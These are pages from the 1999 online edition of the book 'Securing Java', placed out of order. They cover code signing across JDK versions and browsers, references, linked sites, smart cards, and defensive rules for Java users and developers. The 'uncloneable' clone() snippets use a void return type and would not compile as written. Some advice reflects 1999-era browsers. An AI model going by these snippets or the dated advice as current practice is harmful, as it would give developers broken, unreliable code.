There are a number of major differences between Sun's approach to code signing in JDK 1.1 and Java 2: 1. JDK 1.1 trusts code completely or does not trust it at all; Java 2 allows policy to define what code can and cannot do. This reflects the change from black-and-white trust to shades-of-gray. 2. JDK 1.1 has one tool, javakey, for all code-signing related functions; Java 2 has keytool for certificate management and jarsigner for signing and verifying JARs. 3. JDK 1.1 does not support certificates from Certificate Authorities; Java 2 does allow Certificate Authorities to sign generated certificates, however it is unclear if any CAs currently offer this service.
Search the Book Previous Page
Search Help
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help
Next Page
Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
How to Sign Java Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 8 -- In Conclusion
Next Page
Both Netscape and Microsoft have provided browser-specific methods for leaving their sandboxes. Both rely on external Certificate Authorities to manage identities, but the same certificate used for Netscape cannot be used for Microsoft. Netscape requires applets to use special classes to take advantage of code signing. Microsoft also provides a vendor-specific API for certain capabilities. Both take a similar approach when it comes to prompting the browser's user when certain applets attempt to leave the sandbox. Sun has moved from a black-and-white security policy that allowed trusted code to do anything it wants to a shades-of-gray security policy by which only certain code from certain people can do certain things, depending upon configuration. However, in Java 2, unsigned code can be granted free reign of the system as well if the policy is configured as such. Having unsigned code play outside the sandbox is something that none of the other schemes allow. Each of the four Java code-signing techniques discussed in this tutorial vary in their complexity level, have their own special tools for signing and key management, have different levels of support from VM to VM, and take different approaches to the user's interface to security controls. Considering that Java is meant to be a portable, mobile code system, the large number of compatibility issues surrounding code signing is worrisome. Developers want their applets to do more than the original JDK 1.0.2 sandbox model allowed, but with each vendor providing different ways for code to leave the sandbox, the goal of "sign once, leave the sandbox anywhere" seems highly unlikely.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
References Previous Page
References Abadi, M., Burrows, M., Lampson, B., and Plotkin, G. (1993) A calculus for access control in distributed systems. ACM Transactions on Programming Languages and Systems, 15(4):706-734, September 1993. Anderson, R. and Kuhn, M. (1996) Tamper resistance-a cautionary note. In The Second USENIX Workshop on Electronic Commerce Proceedings, pages 1-11. Also available on the Web at http://www.cl.cam.ac.uk/users/cm213/Publications/tamper.html. Badger, L. and Kohli, M. (1995) Java: Holds great potential-but also security concerns. Data Security Letter, 3:12-15. The Data Security Letter (DSL) is published by Trusted Information Systems (TIS). Boneh, D., DeMillo, A., and Lipton, R. (1997) On the Importance of checking cryptographic protocols for faults. In W. Funny (ed) Advances in Cryptology-Eurocrypt'97, Volume 1233 of Lecture Notes in Computer Science, pages 37-51, Springer-Verlag. Also available on the Web at http://theory.stanford.edu/~dabo/papers/faults.ps.gz. CERT (1996a) CA-96.05: Java applet security manager. See URL http://www.cert.org/advisories/index.html. CERT (1996b) CA-96.07: Java Security bytecode verifier. See URL http://www.cert.org/advisories/index.html. Daconta, M. (1996) Java for C++ Programmers. John Wiley & Sons, New York. Dean, D., Felten, E., and Wallach D. (1996) Java Security: From Hotjava to Netscape and beyond. In Proceedings of the 1996 IEEE Symposium on Security and Privacy, Oakland, CA.
Dean, D. (1998) Formal Aspects of Mobile Code Security. Ph.D. dissertation, Department of Computer Science, Princeton University. Drossopoulou, S. and Eisenbach, S. (1998) Towards an Operations Semantics and Proof of Type Soundness for Java. A technical paper to be included in an as yet unnamed book. Available on the Web online at http://outoften.doc.ic.ac.uk/projects/slurp/papers.html. Erdos, M., Hartman, B., and Mueller, M. (1996) Security Reference Model fo the Java Developer's Kit 1.0.2. Available from Sun Microsystems and also as a Web document on-line at http://www.javasoft.com/security/SRM.html. Fellisen, M. and Friedman, D. (1998) A Little Java, A Few Patterns. MIT Press, Cambridge, MA. Felten, E., Balfanz, D., Dean, D., and Wallach, D. (1997) Web Spoofing: An Internet con game. In Proceedings of the 20th National Information Systems Security Conference, Baltimore, MD. An early version appeared as technical report 540-96 (revised), Department of Computer Science, Princeton University. Flanagan, D. (1997) Java in a Nutshell, second edition. O'Reilly & Associates, Sebastopol, CA. Flanagan, D. (1997) Java Examples in a Nutshell. O'Reilly & Associates, Sebastopol, CA. Friedman, D., Wand, M., and Haynes, C. (1992) Essentials of Programming Languages. MIT Press/McGraw-Hill, Cambridge, MA. Garfinkel, S. And Spafford, G. (1996) Practical Unix & Internet Security, second edition. O'Reilly & Associates, Sebastopol, CA. Ghosh, A. (1998) E-Commerce Security: Weak Links, Best Defenses. John Wiley & Sons, New York. Gong, L., Mueller, M., Prafullchandra, H., and Schemers, R. (1997) Going Beyond the Sandbox: An overview of the new security architecture in the Java Development Kit 1.2. In Proceedings of the USENIX Symposium on Internet Technologies and Systems. Monterey, CA. Gong, L. and Schemers, R. (1998) Implementing Protection Domains in the Java Development Kit 1.2. In Proceedings of the Internet Society Symposium on Network and Distributed System Security, San Diego, CA. Hastings, R. and Joyce, B. (1992) Purify: Fast detection of memory leaks and access errors. In Proceedings of the Winter USENIX Conference, ACM Press.
Horstmann, C. and Cornell, G. (1997) Core Java Volume I--Fundamentals. SunSoft Press, Mountain View, CA. Hughes, L.J. (1995) Actually Useful Internet Security Techniques. New Riders, Indianapolis. Hughes, M., Shoffner, M. and Winslow, M. (1997) Java Network Programming. Manning. ISO7816 (1987) International Standards Organization, International Standard ISO 7816-1 through 7816-6 "Identification cards-Integrated circuit(s) cards with contacts". Available through ISO, New York. LaDue, M. (1996) Java Security: Whose business is it? Published by Online Business Consultants and available as a Web document on-line at http://www.rstcorp.com/hostile-applets/OBCArticle/Article.html. Lewis, T. (1996) What's wrong with Java? IEEE Software, 29(6):8. Lewis's letter to the editor was in response to Java criticism originally printed by him in The NC phenomena: Scenes from your living room, IEEE Software, 29(6):8-10. Lewis, T. (1998) Java Holy War '98. IEEE Computer, 31(3):126-128. Macgregor, R., Durbin, D., Owlett, J. and Yeomans, A. (1998) Java Network Security. Prentice Hall, Saddle River, NJ. Martin, D., Rajagopalan, S, and Rubin, A. (1997) Blocking Java Applets at the Firewall. Proceedings of the 1997 Network and Distributed System Security Symposium. San Diego, March 1997. Also available on the Web at http://www.cs.bu.edu/techreports/96-026-java-firewalls.ps.Z. McGraw, G. and Felten, E. (1996) Java Security: Hostile Applets, Holes, and Antidotes. John Wiley & Sons, New York. (The first edition of this book.) McGraw, G. (1998) Testing for security during development: why we should scrap penetrate and patch. IEEE Aerospace and Electronic Systems, 13(4):13-15, April 1998. Neumann, P. (1995) Computer Related Risks. Addison-Wesley, Reading, MA. Oaks, S. (1998) Java Security. O'Reilly & Associates, Sebastopol, CA. Rubin, A, Geer, D. and Ranum, M. (1997) The Web Security Sourcebook. John Wiley & Sons, New York Schneier, B. (1995) Applied Cryptography: Protocols, Alogorithms, and Source Code in C. John Wiley & Sons, New York. Second edition. Shimomura, T. and Markoff, J. (1996) Takedown: The Pursuit and Capture of Kevin Mitnick, America's
Most Wanted Computer Outlaw-By the Man Who Did It. Hyperion, New York. Spafford, E. (1989) The Internet worm program: An analysis. Computer Communications Review, 19(1):17-57. Stata, R. and Abadi, M. (1998) A type system for Java bytecode subroutines. In Proceedings of the 25th ACM Symposium on Principles of Programming Languages, pages 149-160, January 1998. Sun Microsystems (1995) The Java language: An Overview. Available from Sun and also as a Web document on-line at http://java.sun.com/docs/overviews/java/java-overview-1.html. Sun Microsystems (1996b) The Java Virtual Machine specification. Web document at URL http://www.javasoft.com/docs/books/vmspec/html/VMSpecTOC.doc.html. Available as a book by Lindholm and Yellin from Adison-Wesley. Sun Microsystems (1996c) Low-level security in Java. Web document at URL http://www.javasoft.com/sfaq/verifier.html/ by Frank Yellin. Sun Microsystems (1997) Java card 2.0 programming concepts revision 1.0 final. Web document at URL http://www.javasoft.com/products/javacard/index.html. Venners, B. (1998) Inside the Java Virtual Machine. McGraw-Hill. New York. Voas, J. and McGraw, G. (1998) Software Fault Injection: Inoculating Programs Against Errors. John Wiley and Sons. New York. See the Web site at http://www.rstcorp.com/books/sfi/. Wallach, D., Balfanz, D., Dean, D. and Felten, E. (1997) Extensible Security Architectures for Java. In Proceedings of the 16th Symposium on Operating Systems Principles (Saint-Malo, France), October, 1997. Wallach, D. and Felten, E. (1998) Understanding Java Stack Inspection. In Proceedings of the 1998 IEEE Symposium on Security and Privacy, Oakland, CA. Wallach, D. (1998) A New Approach to Mobile Code Security. Ph.D. dissertation, Department of Computer Science, Princeton University. Young, Boebert, and Kain (1985) Article in an IEEE Tutorial on Computer Network Security. IEEE Press.
Web sites Referenced in the Text
All of the following links can be found on a page of the companion Web site for this book at www.securingjava.com.
Chapter 1 Don't Push Me: The Security Implications of Push. developer.com TechFocus article by Gary McGraw. Java Developer's Kit (JDK) available free from Javasoft. Also other official Java information. Javasoft's Frequently Asked Questions: Applet Security Security Tradeoffs: Java versus ActiveX. Princeton Safe Internet Programming FAQ. Also see Appendix A. JavaScript Problems I've Discovered. John LoVerso's JavaScript Security site. developer.com, an on-line publication for Java developers. JavaWorld, an on-line publication for Java enthusiasts and developers. MindQ, an on-line training company specializing in Java. Yahoo! An excellent starting point for Web surfing. A large Web index. AltaVista. One of the top search engines on the Web. Java Security Hotlist. Also see Appendix B. Princeton's Secure Internet Programming Team. Includes the Java Security FAQ. The Java Books list. An extensive list of all books published about Java (way too many). The Java Security Web Site. This book's companion Web site. Includes the Java Security Hotlist.
Chapter 2 The Hostile Applets Home Page, a collection of hostile applets written by Mark LaDue.
Chapter 3
Understanding Java Stack Inspection by Wallach and Felten. Sun's document explaining the security API change.
Chapter 4 The Hostile Applets Home Page DigiCrime (disable Java and JavaScript before you surf this site) The Java Security Hotlist: Hostile Applets and Other Toys Digicrime's Blue Screen of Death page. The actual byte code of the bluescreen applet. Ahpah Software makes the SourceAgain decompiler. Earthweb's Java applet database. Sun Microsystem's Frequently Asked Questions - Java Security Princeton's Java Security: Frequently Asked Questions (included as Appendix A) Princeton's Security Tradeoffs: Java vs. ActiveX (included as Appendix A) The Java Security Web Site, companion Web site for this book
Chapter 5 An archive of the security-related bugtraq archive Javasoft's Frequently Asked Questions: Java Security Princeton Secure Internet Programming Team's Java Security FAQ. Also see Appendix A. Major Malfunction and Ben Laurie explain the security holes they discovered Princeton's Secure Internet Programming Team University of Washington's Kimera Project
Type safety problems discovered in Sun's Verifier by the Kimera Project Ben Mesander's applet WhereDoYouWantToGoToday
Chapter 6 Princeton's seminal paper, Java Security: From HotJava to Netscape and Beyond Formalizing the JVM at Computational Logic, Inc. Javasoft's Security Reference Model for JDK 1.0.2 The Jasmin byte code assembler Ahpah Software sells the SourceAgain Java Decompiler Finjan Software, Ltd. Mark LaDue takes on Finjan Mark LaDue takes on Finjan again Digitivity Security7 WithinReach Cult of the Dead Cow produces the Back Orifice exploit esafe Princeton Secure Internet Programming Team's Java Filter Class Loader International Computer Security Association Marcus Ranum discusses firewall certification Mark LaDue's Hostile Applet Mutation Generator
Chapter 7 The Java Security Web Site, companion site for this book The Java Security Hotlist Sun's Java Security FAQ Martin et al.'s paper Blocking Java Applets at the Firewall
Chapter 8 Gemplus: JavaCard and GemXpresso Schlumberger: Cyberflex Javasoft: Java Card Technology, specifications for Card Java can be found here Boneh, DeMillo, and Lipton's On the Importance of Checking Cryptographic Protocols for Faults Anderson and Kuhn's Tamper Resistance-A Cautionary Note Crptography Research, Inc. information on Differential Power Analysis
Search the Book Previous Page
Search Help
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Previous Page
Java Card Security How Smart Cards and Java Mix
Next Page
We emphasize throughout this book that Java is much more than simply a programming language. This chapter takes that lesson to heart and discusses Java's role in a technology destined to become part of all our lives in the near future-smart cards. In light of its history as a platform for embedded devices, it's a bit ironic, but not surprising, that in one of its many forms, Java is coming full circle back to its embedded roots. Smart cards provide an important enabling technology for e-commerce. They are integral building blocks in many systems currently on the drawing board and a few systems already in service. Java can help make smart cards more accessible to developers and business people by providing a well-understood, familiar environment. One of the barriers blocking the adoption of smart cards throughout the world has been the lack of a common platform on which to develop applications. Java can help dismantle that barrier, opening a world of potential development opportunities to Java developers and cutting-edge organizations. This chapter answers a number of questions about Java-based smart cards, including: ● ● ● ● ● ●
What is a smart card? Why put Java on a smart card? How can Java fit on a card? How secure are smart cards? What role can smart cards play in e-commerce systems? How does the use of Java impact smart card security?
These questions are important ones to ask since smart cards have already started appearing in consumer wallets, especially in Europe.
Chapter Eight Sections
1. 2. 3. 4. 5. 6. 7. 8.
Java Security Goes Both Ways What Is a Smart Card? Why Put Java on a Smart Card? How Can Java Fit on a Card? How Secure Are Smart Cards? What Role Can Smart Cards Play in E-Commerce Systems? How Does the Use of Java Impact Smart Card Security? Managing Risks
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Security Guidelines: Developing and Using Java More Securely CHAPTER SECTIONS: 1 / 2 / 3 Previous Page
Next Page
Section 3 -- Guidelines Are Never Perfect
The guidelines included in this chapter can help you develop more secure code and use Java more securely, but in the end, they can't guarantee anything about security. Following the two sets of guidelines is probably a good idea, but risks will always remain, no matter how vigilant you are. Plan accordingly. If you are doing business on the Net, be particularly careful. The stakes change significantly when it comes to electronic commerce. An appropriate introduction to the security dangers inherent in ecommerce is Anup Ghosh's book, E-Commerce Security [Ghosh, 1998]. Whatever you do, pay close attention to the tradeoffs between functionality and risk. We make security and safety tradeoffs every day when we leave the house, and often they are very appropriate. Making these decisions is more reasonable when you know about potential pitfalls.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Security Guidelines: Developing and Using Java More Securely CHAPTER SECTIONS: 1 / 2 / 3 Previous Page
Next Page
Section 2 -- Guidelines for Java Users
It is all well and good to talk about what can be done to improve the next version of Java, or how you as a developer can create safer code, but what can a regular Java user do to stay safe? Are there guidelines for safely using Java as it exists today? There are several straightforward things you can do to make your use of Java safer. Most of these are based on good old-fashioned common sense; others require a bit of knowledge about Java. We have compiled a set of guidelines from the other chapters and have organized them here. ● ● ● ● ● ● ●
Know what Web sites you are visiting. Learn as much as you can about Java security. Know your Java environment. Use up-to-date browsers with the latest security updates. Keep a lookout for security alerts. Apply drastic measures if your information is truly critical. Assess your risks.
Know What Web Sites You Are Visiting The first piece of advice we have is of the common-sense variety: Know what sorts of sites you are visiting with your Web browser. The chances of being attacked by an applet from a large corporate site like www.sun.com are minimal. The chances of suffering an attack while surfing an underground cracker Web page are, of course, much greater. All dangerous Web sites may not be run by bad guys, however. One interesting cracker strategy might be
to hack a Web server in a very public fashion (something that has been done to the U.S. Department of Justice, the U.S. Air Force, and the Central Intelligence Agency, among others [Ghosh, 1998]), but add a twist. The media coverage will cause many thousands of people to surf to the hacked site to "check it out." Here's where an attack applet would do the most damage! Since the Web server has been hacked, the cracker figures, why not install some mobile code that attacks all surfers indiscriminately? All the curiosity seekers thus become de facto targets. In any case, there are certainly unsafe places on the Web. An analogy may be useful here. Both of the authors are sorry to admit they drive minivans. There are places in a large city such as Washington, D.C. where no one in his or her right mind would drive a minivan. Just as you shouldn't drive your minivan in certain areas of the city, you shouldn't drive your Java-enabled browser to certain areas of the Web. You can avoid risk-laden Web sites by employing the same strategy you would use when visiting a big city. Use your intuition to assess your environment continually when you surf. If you are tempted to visit some cracker Web sites, do so with Java turned off. (Actually, make sure that all types of executable content are disabled when visiting such sites!) The Internet and the Web are reflections of society, no more and no less. There are sites that reflect the pinnacle of what people can achieve, and there are those that reflect the depths to which people can lower themselves. Know that just as there are bad people who rob banks and mug people in the real world, there are bad people on the Web. Some of these people create traps to prey on unsuspecting surfers. Depending on your level of paranoia, you might consider all unknown Web sites as risky locations. A good strategy might be to leave Java off by default and turn it on only when you make a conscious decision to trust a site. Many business sites require that their employees use Java this way. This strategy is easy to implement. We discussed how to disable and enable Java on two popular browsers in Chapter 4, "Malicious Applets: Avoiding a Common Nuisance." This guideline takes on more weight as the world rushes into electronic commerce. If your PC has data on it that help you transact business over the Net (such as trading stocks) then you need to be concerned about computer security. The addition of money (virtual or not) to the Net changes the stakes significantly.
Learn as Much as You Can about Java Security By reading this book, you are off to a good start. Keep in mind, however, that Java security is a fastmoving field. Since Java's introduction in 1996, the security landscape has changed dramatically: ● ● ●
Tens of millions more people are connected to the Internet. Java has undergone two major releases. The security model has evolved to include signed applets.
There is no reason to believe that Java's evolution will slow. In fact, Java's quick move to maturity is essential to its long-term viability as a language. One way to keep abreast of Java security happenings is to sign up for notification of breaking Java security news. On this book's companion Web site at www.rstcorp.com/java-security.html, you can submit a form to be added to our notification mailing list. Note that this list will not be sold, rented, or otherwise shared with anyone other than the authors. We promise. We hate spam as much as anyone! You should also keep tabs on the Java Security Hotlist (see Appendix B, "The Java Security Hotlist," and www.rstcorp.com/javasecurity/links.html).
Know Your Java Environment Another piece of common-sense advice is to know about the Java tools that you are using. Know how Java works (this book should help). Now that you know how Java treats signed classes with privilege, you know how important it is to consider carefully what your security policy looks like and who created it. Also be aware that early versions of Java (including JDK 1.1) allow built-in code full power to do anything. Before Java 2, built-in classes were allowed to bypass all security verification checks. If you are using a browser that does not yet support Java 2, never put Java classes (or .jar archives of classes) in your CLASSPATH unless you fully trust the vendor that distributed them. Also be aware that any subdirectories under the directories in your CLASSPATH may be searched for a class as well. Know who built your Java libraries and tools. Similarly, do not install or otherwise change your Java security policy under the influence of a vendor or other mobile code distributor. A potential social engineering attack against a site running Java 2 could involve convincing a user to redefine security policy in order to run some cool Java code. If you must change policy, think long and hard about why and about who you may be trusting. Be aware of what Java version you are using. Several companies have licensed the right to produce Java development environments. Some probably do a better job with security than others. If the Java VM is buggy, then Java security is compromised. By using a particular vendor's version of Java, you are trusting the security of your machine to them. This is actually a general lesson that applies to many technologies. Browser plugins should be subject to similar scrutiny. So, too, should any executable binaries loaded from the Internet. Finally, find out who controls your browser's Java security policy. Some corporate users may be surprised to learn that they are not in control of their surfing security policy. Starting with version 4, both Netscape
Navigator and Microsoft Internet Explorer allow a system administrator to set security policy and lock it in so that it cannot be overridden by users. Some sites attempt to block Java and other mobile code traffic at the firewall (although see Chapter 6, "Securing Java: Improvements, Solutions, and Snake Oil"). If you do control your own policy, make sure you set up a policy that is sound and coherent. Be aware that setting up a security policy is nontrivial and often leads to subtle errors.
Use Up-to-Date Browsers with the Latest Security Updates This guideline may be a bit counterintuitive, but you should always use the latest version of your favorite browser-even if it is a beta version. All of the security holes discussed in Chapter 5, "Attack Applets: Exploiting Holes in the Security Model," have been fixed in the very latest versions of Netscape and Internet Explorer. Be aware that no new versions of the early releases have been updated to fix bugs. This implies that the beta versions are more secure. Of course, beta versions may also have new bugs of their own. Recall that although the Princeton Class Loader attack has been fixed for most versions of Netscape (see Applets Running Wild in Chapter 5), the problem persists in version 2.0. The same thing goes for the Jumping-the-Firewall attack. Counting on an old version of a browser for your security is probably not a good idea. Use the next guideline to help determine which version of a browser you need to have. Then get it.
Keep a Lookout for Security Alerts Every once in a while, check the latest security information on Java. This book's companion Web site (www.securingjava.com) is quite current, but you should also keep an eye on the Sun Microsystems official Java Security FAQ. Also, have someone in your organization (or someone in your group of friends) subscribe to the CERT Alert list. If the CERT Coordination Center finds a security hole either particularly egregious or particularly popular among crackers, they will warn the community at large. To date, CERT has issued two security alerts about Java. Both were related to attacks found by the Princeton team. The alerts were reprinted in Appendix B of Java Security: Hostile Applets, Holes, & Antidotes (the first edition of this book), where you will also find information about signing up for online delivery of CERT Alerts. The CERT Alerts have the advantage of telling you the status of any security attacks and how to avoid them. For Java, this includes information about which browser versions are susceptible to a particular attack and which versions have been patched.
More Drastic Measures There are, of course, a couple of drastic measures that can be applied to lessen Java security risks. These both involve not using Java. These drastic alternatives are not called for unless your information is ultracritical. If you determine that the risks described are simply too great for you to bear, you can implement these strategies.
Stopping Java at the Firewall Many firewall vendors claim to have added the capability of stopping Java applets at the gate by using special firewall products. Some firewalls block Java applets by parsing a Web page's HTML code as it arrives. This action is typically performed by the HTTP proxy. HTML-parsing capability makes a firewall capable of blocking any HTML-related tag. Thus, the relevant proxy can cut out Java (by looking for the <APPLET> tag), JavaScript, and even old HTML 2.0 tags that are deemed disallowed during setup. This strategy is useful only for HTML coming in through the proxy via HTTP. That means that applets coming into the system in other ways (for example, through SSL or via ftp) can still get through. Another solution to the same problem might be to try to stop all files with a .class extension at the gate. Still another would be to scan all incoming binaries for the magic number each applet is required to have. The end result is the same: No applets are allowed past the firewall. Research results show that stopping mobile code is much more difficult than it may seem at first glance. An excellent technical paper entitled Blocking Java Applets at the Firewall by David Martin (Boston University), S. Rajagopalan (Bellcore), and Avi Rubin (ATT Research) can be downloaded from www.cs.bu.edu/techreports/96-026-java-firewalls.ps.Z (or see the Java Security Hotlist). Stopping all applets at the firewall is a radical solution that gives up all the good things that Java has to offer. It may be a viable alternative for machines that require limited Web access but are considered too important to expose to any risk beyond that. Unfortunately, this strategy resembles throwing the baby out with the bath water.
Hiding Under the Bed Believe it or not, there are strategies even more paranoid than blocking applets at the firewall. Some sites may have such sensitive information that they decide they can't afford to take any risks at all. These sites protect themselves by not even connecting to the Internet in the first place. Java risk is thoroughly countered by this strategy, but all of the benefits that come with being connected to the Internet are given up in return. Java's power and flexibility may still find room on such a company's intranet, but there will certainly be fewer uses for Java.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Security Guidelines: Developing and Using Java More Securely CHAPTER SECTIONS: 1 / 2 / 3 Previous Page
Next Page
Section 1 -- Guidelines for Java Developers
This section introduces 12 rules for writing security-critical Java code; 12 rules that all Java developers should abide by. If you are charged with managing a gaggle of Java developers, or if your business relies on the security of Java, make sure your developers follow these rules. These rules have not been sugar-coated for mass consumption. They get fairly technical and require broad knowledge of Java. Although experienced Java developers will understand all of the rules, less-experienced Java developers may have a bit of homework to do. Nevertheless, these rules are important and can make your Java code more secure. The rules listed here were built on the experiences of many people who have generously discussed their experiences in building secure Java code. We are particularly grateful to Andrew Appel, Dirk Balfanz, Drew Dean, and Dan Wallach, of the Secure Internet Programming Team at Princeton, for helping us understand these issues. Others who have contributed significantly to the behind-the-scenes thinking that went into these rules include David Hopwood, Li Gong, and Jim Roskind. The rules are based on much experience in hunting down Java security bugs, and on advice and observations from people who write and review security-critical Java code for a living. Each rule is designed to eliminate an unexpected "gotcha" that you might face. Of course, security is an elusive goal, and following these rules certainly won't provide any guarantee that your code is secure. It is easy to write insecure code that follows these rules. The goal of these rules is not to guarantee security, but to eliminate certain kinds of security attacks that you might not have thought of. If you follow these rules, certain kinds of attacks will be impossible; other kinds will still be possible. So think of these rules as a first step. If you are writing code that may be linked or run in conjunction with untrusted code, then you should definitely consider following these rules. Every attempt was made to keep the rules simple enough that you can treat them as a checklist to be
followed in mechanical fashion. That way, you can save your brainpower for other security issues.
Rule 1: Don't Depend on Initialization Most Java developers think that there is no way to allocate an object without running a constructor. This is not true: There are several ways to allocate uninitialized objects. The easy way to protect yourself against this problem is to write your classes so that before any object does anything, it verifies that it has been initialized. You can do this as follows: ●
● ● ●
●
●
● ● ●
Make all variables private. If you want to allow outside code to access variables in an object, this should be done via get/set methods. (This keeps outside code from accessing uninitialized variables.) If you're following Rule 3, you'll make the get and set methods final. Add a new private boolean variable, called initialized, to each object. Have each constructor set the initialized variable as its last action before returning. Have each nonconstructor method verify that initialized is true, before doing anything. (Note that you may have to make exceptions to this rule for methods that are called by your constructors. If you do this, it is best to make the constructors call only private methods.) If your class has a static initializer, you will need to do the same thing at the class level. Specifically, for any class that has a static initializer, follow these steps: Make all static variables private. If you want to allow outside code to access static variables in the class, this should be done via static get/set methods. This keeps outside code from accessing uninitialized static variables. If you're following Rule 3, you'll make the get and set methods final. Add a new private static boolean variable, called classInitialized to the class. Have the static constructor set the classInitialized variable as its last action before returning. Have each static method, and each constructor, verify that classInitialized is true, before doing anything. (Note: Constructors are required to call a constructor of the superclass or another constructor of the same class as their first action. Therefore, you will have to do that before you check classInitialized.)
Rule 2: Limit Access to Your Classes, Methods, and Variables Every class, method, and variable that is not private provides a potential entry point for an attacker. By default, everything should be private. Make something non-private only if there is a good reason, and document that reason.
Rule 3: Make Everything Final, Unless There's a Good Reason Not To
If a class or method is non-final, an attacker could try to extend it in a dangerous and unforeseen way. By default, everything should be final. Make something non-final only if there is a good reason, and document that reason. You might think that you can prevent an attacker from extending your class or its methods by declaring the class non-public. However, if a class is not public, it must be accessible from within the same package, and as we shall see, Rule 4 says not to rely on package-scope access restrictions for security. This advice may seem harsh. After all, the rule is asking you to give up extensibility, which is one of the main benefits of using an object-oriented language like Java. When you're trying to provide security, however, extensibility is your enemy; it just provides an attacker with more ways to cause trouble.
Rule 4: Don't Depend on Package Scope Classes, methods, and variables that are not explicitly labeled as public, private, or protected are accessible within the same package. Don't rely on this for security. Java classes are not closed, so an attacker could introduce a new class inside your package, and use this new class to access the things you thought you were hiding. (A few packages, such as java.lang, are closed by default, and a few JVMs let you close your own packages. However, you're better off assuming that packages are not closed.) Package scope makes a lot of sense from a software-engineering standpoint, since it prevents innocent, accidental access to things that you want to hide. But don't depend on it for security. Maybe we'll get sealed classes in the future.
Rule 5: Don't Use Inner Classes Some Java language books say that inner classes can only be accessed by the outer classes that enclose them. This is not true. Java byte code has no concept of inner classes, so inner classes are translated by the compiler into ordinary classes that happen to be accessible to any code in the same package. And Rule 4 says not to depend on package scope for protection. But wait, it gets worse. An inner class gets access to the fields of the enclosing outer class, even if these fields are declared private. And the inner class is translated into a separate class. In order to allow this separate class access to the fields of the outer class, the compiler silently changes these fields from private to package scope! It's bad enough that the inner class is exposed, but it's even worse that the compiler is silently overruling your decision to make some fields private. Don't use inner classes if you can help it. (Ironically, the new Java 2 doPrivileged() API usage guidelines suggest that you use an inner class to write privileged code. That's one reason we don't like the doPrivileged() API.)
Rule 6: Avoid Signing Your Code Code that is not signed will run without any special privileges. And if your code has no special privileges, then it is much less likely to do damage. Of course, some of your code might have to acquire and use privileges to perform some dangerous operation. Work hard to minimize the amount of privileged code, and audit the privileged code more carefully than the rest.
Rule 7: If You Must Sign Your Code, Put It All in One Archive File The goal of this rule is to prevent an attacker from carrying out a mix-and-match attack in which the attacker constructs a new applet or library that links some of your signed classes together with malicious classes, or links together signed classes that you never meant to be used together. By signing a group of classes together, you make this attack more difficult. Existing code-signing systems do an inadequate job of preventing mix-and-match attacks, so this rule cannot prevent such attacks completely. But using a single archive can't hurt. Some code-signing systems let you examine other classes to see who signed them. If you are using a codesigning system that allows this, you can put code into the static constructors of your classes to verify that the "surrounding" classes have been signed by the same person as expected. Examining signers is one way to avoid the example shown in Figure 7.1. This doesn't completely prevent mix-and-match attacks, since an adversary can still mix together classes that you signed at different times; for example, by mixing version 1 of Class A with version 2 of Class B. If you're worried about this kind of interversion mix-and-match attack, you can put each class's "version stamp" in a public final variable and then have each class check the version stamps of its surrounding classes.
Figure 7.1 A mix and match attack. In one type of mix and match attack, signed code with special privilege is linked or otherwise grouped together with unsigned code. The danger is that the unsigned code will be replaced in the group, leading to undefined and possibly dangerous behavior.
Rule 8: Make Your Classes Uncloneable Java's object-cloning mechanism can allow an attacker to manufacture new instances of classes you define, without executing any of your constructors. If your class is not cloneable, the attacker can define a subclass of your class, and make the subclass implement java.lang.Cloneable. This allows the attacker to make new instances of your class. The new instances are made by copying the memory images of existing objects; although this is sometimes an acceptable way to make a new object, it often is not. Rather than worry about this, you're better off making your objects uncloneable. You can do this by defining the following method in each of your classes: public final void clone() throws java.lang.CloneNotSupportedException { throw new java.lang.CloneNotSupportedException(); }
If you want your class to be cloneable, and you've considered the consequences of that choice, then you can still protect yourself. If you're defining a clone method yourself, make it final. If you're relying on a nonfinal clone method in one of your superclasses, then define this method: public final void clone() throws java.lang.CloneNotSupportedException { super.clone(); }
This prevents an attacker from redefining your clone method.
Rule 9: Make Your Classes Unserializeable Serialization is dangerous because it allows adversaries to get their hands on the internal state of your objects. An adversary can serialize one of your objects into a byte array that can be read. This allows the adversary to inspect the full internal state of your object, including any fields you marked private as well as the internal state of any objects you reference. To prevent this, you can make your object impossible to serialize. The way to do this is to declare the writeObject method: private final void writeObject(ObjectOutputStream out) throws java.io.IOException { throw new java.io.IOException("Object cannot be serialized"); }
This method is declared final so that a subclass defined by the adversary cannot override it.
